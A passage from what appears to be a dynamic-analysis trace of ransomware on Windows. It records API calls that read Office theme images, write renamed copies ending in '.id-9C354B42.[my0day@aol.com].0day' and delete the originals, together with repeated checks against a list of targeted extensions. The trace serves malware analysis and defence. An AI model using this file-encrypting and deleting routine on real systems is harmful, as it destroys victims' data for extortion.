Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\THMBNAIL.PNG") returned 77 [0045.061] lstrlenW (lpString=".dbf") returned 4 [0045.061] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0045.061] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\THMBNAIL.PNG") returned 77 [0045.061] lstrlenW (lpString=".1cd") returned 4 [0045.061] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0045.061] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\THMBNAIL.PNG") returned 77 [0045.061] lstrlenW (lpString=".jpg") returned 4 [0045.061] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0045.061] lstrcmpiW (lpString1=".PNG", lpString2=".0day") returned 1 [0045.061] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0045.061] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\echo\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0045.062] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x2d9ff1c | out: lpFileSize=0x2d9ff1c*=25106) returned 1 [0045.062] CloseHandle (hObject=0x170) returned 1 [0045.062] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\echo\\thmbnail.png")) returned 0x20 [0045.062] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\THMBNAIL.PNG.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\echo\\thmbnail.png.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0045.062] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\echo\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0045.062] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.062] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.062] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\THMBNAIL.PNG.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\echo\\thmbnail.png.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0045.062] GetLastError () returned 0x0 [0045.062] ReadFile (in: hFile=0x170, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0x6212, lpOverlapped=0x0) returned 1 [0045.084] WriteFile (in: hFile=0x188, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0x6220, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0x6220, lpOverlapped=0x0) returned 1 [0045.085] ReadFile (in: hFile=0x170, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0x0, lpOverlapped=0x0) returned 1 [0045.085] WriteFile (in: hFile=0x188, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0xec, lpOverlapped=0x0) returned 1 [0045.086] SetEndOfFile (hFile=0x188) returned 1 [0045.086] CloseHandle (hObject=0x188) returned 1 [0045.086] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.086] SetEndOfFile (hFile=0x170) returned 1 [0045.087] CloseHandle (hObject=0x170) returned 1 [0045.087] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\THMBNAIL.PNG.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0045.087] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\echo\\thmbnail.png")) returned 1 [0045.087] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\THMBNAIL.PNG") returned 73 [0045.087] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\THMBNAIL.PNG") returned 73 [0045.087] lstrlenW (lpString=".doc") returned 4 [0045.087] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0045.087] lstrlenW (lpString=".docx") returned 5 [0045.087] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0045.087] lstrlenW (lpString=".pdf") returned 4 [0045.087] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0045.087] lstrlenW (lpString=".xls") returned 4 [0045.087] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0045.087] lstrlenW (lpString=".xlsx") returned 5 [0045.088] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0045.088] lstrlenW (lpString=".ppt") returned 4 [0045.088] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0045.088] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\THMBNAIL.PNG") returned 73 [0045.088] lstrlenW (lpString=".zip") returned 4 [0045.088] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0045.088] lstrlenW (lpString=".rar") returned 4 [0045.088] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0045.088] lstrlenW (lpString=".bz2") returned 4 [0045.088] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0045.088] lstrlenW (lpString=".7z") returned 3 [0045.088] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0045.088] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\THMBNAIL.PNG") returned 73 [0045.088] lstrlenW (lpString=".dbf") returned 4 [0045.088] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0045.088] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\THMBNAIL.PNG") returned 73 [0045.088] lstrlenW (lpString=".1cd") returned 4 [0045.088] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0045.088] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\THMBNAIL.PNG") returned 73 [0045.088] lstrlenW (lpString=".jpg") returned 4 [0045.088] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0045.088] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\THMBNAIL.PNG") returned 73 [0045.088] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\THMBNAIL.PNG") returned 73 [0045.088] lstrlenW (lpString=".doc") returned 4 [0045.088] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0045.088] lstrlenW (lpString=".docx") returned 5 [0045.088] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0045.088] lstrlenW (lpString=".pdf") returned 4 [0045.088] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0045.088] lstrlenW (lpString=".xls") returned 4 [0045.088] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0045.088] lstrlenW (lpString=".xlsx") returned 5 [0045.088] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0045.088] lstrlenW (lpString=".ppt") returned 4 [0045.089] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0045.089] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\THMBNAIL.PNG") returned 73 [0045.089] lstrlenW (lpString=".zip") returned 4 [0045.089] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0045.089] lstrlenW (lpString=".rar") returned 4 [0045.089] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0045.089] lstrlenW (lpString=".bz2") returned 4 [0045.089] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0045.089] lstrlenW (lpString=".7z") returned 3 [0045.089] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0045.089] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\THMBNAIL.PNG") returned 73 [0045.089] lstrlenW (lpString=".dbf") returned 4 [0045.089] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0045.089] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\THMBNAIL.PNG") returned 73 [0045.089] lstrlenW (lpString=".1cd") returned 4 [0045.089] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0045.089] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECHO\\THMBNAIL.PNG") returned 73 [0045.089] lstrlenW (lpString=".jpg") returned 4 [0045.089] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0045.089] lstrcmpiW (lpString1=".PNG", lpString2=".0day") returned 1 [0045.089] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0045.089] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\eclipse\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198 [0045.147] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x2d9ff1c | out: lpFileSize=0x2d9ff1c*=32403) returned 1 [0045.147] CloseHandle (hObject=0x198) returned 1 [0045.147] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\eclipse\\thmbnail.png")) returned 0x20 [0045.147] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\THMBNAIL.PNG.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\eclipse\\thmbnail.png.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0045.147] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\eclipse\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198 [0045.147] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.147] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.147] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\THMBNAIL.PNG.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\eclipse\\thmbnail.png.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0045.148] GetLastError () returned 0x0 [0045.148] ReadFile (in: hFile=0x198, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0x7e93, lpOverlapped=0x0) returned 1 [0045.149] WriteFile (in: hFile=0x17c, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0x7ea0, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0x7ea0, lpOverlapped=0x0) returned 1 [0045.151] ReadFile (in: hFile=0x198, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0x0, lpOverlapped=0x0) returned 1 [0045.151] WriteFile (in: hFile=0x17c, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0xec, lpOverlapped=0x0) returned 1 [0045.151] SetEndOfFile (hFile=0x17c) returned 1 [0045.151] CloseHandle (hObject=0x17c) returned 1 [0045.151] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.151] SetEndOfFile (hFile=0x198) returned 1 [0045.152] CloseHandle (hObject=0x198) returned 1 [0045.152] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\THMBNAIL.PNG.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0045.152] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\eclipse\\thmbnail.png")) returned 1 [0045.152] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\THMBNAIL.PNG") returned 76 [0045.152] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\THMBNAIL.PNG") returned 76 [0045.152] lstrlenW (lpString=".doc") returned 4 [0045.152] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0045.152] lstrlenW (lpString=".docx") returned 5 [0045.152] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0045.152] lstrlenW (lpString=".pdf") returned 4 [0045.152] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0045.153] lstrlenW (lpString=".xls") returned 4 [0045.153] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0045.153] lstrlenW (lpString=".xlsx") returned 5 [0045.153] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0045.153] lstrlenW (lpString=".ppt") returned 4 [0045.153] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0045.153] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\THMBNAIL.PNG") returned 76 [0045.153] lstrlenW (lpString=".zip") returned 4 [0045.153] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0045.153] lstrlenW (lpString=".rar") returned 4 [0045.153] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0045.153] lstrlenW (lpString=".bz2") returned 4 [0045.153] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0045.153] lstrlenW (lpString=".7z") returned 3 [0045.153] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0045.153] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\THMBNAIL.PNG") returned 76 [0045.153] lstrlenW (lpString=".dbf") returned 4 [0045.153] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0045.153] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\THMBNAIL.PNG") returned 76 [0045.153] lstrlenW (lpString=".1cd") returned 4 [0045.153] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0045.153] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\THMBNAIL.PNG") returned 76 [0045.153] lstrlenW (lpString=".jpg") returned 4 [0045.153] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0045.153] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\THMBNAIL.PNG") returned 76 [0045.153] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\THMBNAIL.PNG") returned 76 [0045.153] lstrlenW (lpString=".doc") returned 4 [0045.153] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0045.153] lstrlenW (lpString=".docx") returned 5 [0045.153] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0045.153] lstrlenW (lpString=".pdf") returned 4 [0045.153] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0045.153] lstrlenW (lpString=".xls") returned 4 [0045.153] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0045.153] lstrlenW (lpString=".xlsx") returned 5 [0045.153] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0045.153] lstrlenW (lpString=".ppt") returned 4 [0045.154] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0045.154] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\THMBNAIL.PNG") returned 76 [0045.154] lstrlenW (lpString=".zip") returned 4 [0045.154] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0045.154] lstrlenW (lpString=".rar") returned 4 [0045.154] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0045.154] lstrlenW (lpString=".bz2") returned 4 [0045.154] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0045.154] lstrlenW (lpString=".7z") returned 3 [0045.154] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0045.154] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\THMBNAIL.PNG") returned 76 [0045.154] lstrlenW (lpString=".dbf") returned 4 [0045.154] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0045.154] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\THMBNAIL.PNG") returned 76 [0045.154] lstrlenW (lpString=".1cd") returned 4 [0045.154] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0045.154] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ECLIPSE\\THMBNAIL.PNG") returned 76 [0045.154] lstrlenW (lpString=".jpg") returned 4 [0045.154] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0045.154] lstrcmpiW (lpString1=".GIF", lpString2=".0day") returned 1 [0045.154] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0045.154] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\evrgreen\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198 [0045.154] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x2d9ff1c | out: lpFileSize=0x2d9ff1c*=1354) returned 1 [0045.155] CloseHandle (hObject=0x198) returned 1 [0045.155] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\evrgreen\\preview.gif")) returned 0x20 [0045.155] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\PREVIEW.GIF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\evrgreen\\preview.gif.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0045.155] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\evrgreen\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198 [0045.155] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.155] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.155] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\PREVIEW.GIF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\evrgreen\\preview.gif.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0045.156] GetLastError () returned 0x0 [0045.156] ReadFile (in: hFile=0x198, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0x54a, lpOverlapped=0x0) returned 1 [0045.158] WriteFile (in: hFile=0x178, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0x550, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0x550, lpOverlapped=0x0) returned 1 [0045.159] ReadFile (in: hFile=0x198, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0x0, lpOverlapped=0x0) returned 1 [0045.159] WriteFile (in: hFile=0x178, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0xea, lpOverlapped=0x0) returned 1 [0045.159] SetEndOfFile (hFile=0x178) returned 1 [0045.159] CloseHandle (hObject=0x178) returned 1 [0045.159] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.159] SetEndOfFile (hFile=0x198) returned 1 [0045.160] CloseHandle (hObject=0x198) returned 1 [0045.160] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\PREVIEW.GIF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0045.160] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\evrgreen\\preview.gif")) returned 1 [0045.250] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\PREVIEW.GIF") returned 76 [0045.250] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\PREVIEW.GIF") returned 76 [0045.250] lstrlenW (lpString=".doc") returned 4 [0045.250] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0045.250] lstrlenW (lpString=".docx") returned 5 [0045.250] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0045.250] lstrlenW (lpString=".pdf") returned 4 [0045.250] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0045.250] lstrlenW (lpString=".xls") returned 4 [0045.250] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0045.250] lstrlenW (lpString=".xlsx") returned 5 [0045.250] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0045.250] lstrlenW (lpString=".ppt") returned 4 [0045.250] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0045.250] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\PREVIEW.GIF") returned 76 [0045.250] lstrlenW (lpString=".zip") returned 4 [0045.250] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0045.250] lstrlenW (lpString=".rar") returned 4 [0045.250] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0045.250] lstrlenW (lpString=".bz2") returned 4 [0045.250] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0045.250] lstrlenW (lpString=".7z") returned 3 [0045.250] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0045.250] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\PREVIEW.GIF") returned 76 [0045.250] lstrlenW (lpString=".dbf") returned 4 [0045.250] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0045.250] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\PREVIEW.GIF") returned 76 [0045.250] lstrlenW (lpString=".1cd") returned 4 [0045.251] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0045.251] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\PREVIEW.GIF") returned 76 [0045.251] lstrlenW (lpString=".jpg") returned 4 [0045.251] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0045.251] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\PREVIEW.GIF") returned 76 [0045.251] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\PREVIEW.GIF") returned 76 [0045.251] lstrlenW (lpString=".doc") returned 4 [0045.251] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0045.251] lstrlenW (lpString=".docx") returned 5 [0045.251] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0045.251] lstrlenW (lpString=".pdf") returned 4 [0045.251] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0045.251] lstrlenW (lpString=".xls") returned 4 [0045.251] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0045.251] lstrlenW (lpString=".xlsx") returned 5 [0045.251] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0045.251] lstrlenW (lpString=".ppt") returned 4 [0045.251] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0045.251] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EVRGREEN\\PREVIEW.GIF") returned 76 [0045.251] lstrlenW (lpString=".zip") returned 4 [0045.251] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0045.251] lstrlenW (lpString=".rar") returned 4 [0045.251] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0045.251] lstrlenW (lpString=".bz2") returned 4 [0045.251] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0045.251] lstrlenW (lpString=".7z") returned 3 [0045.251] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 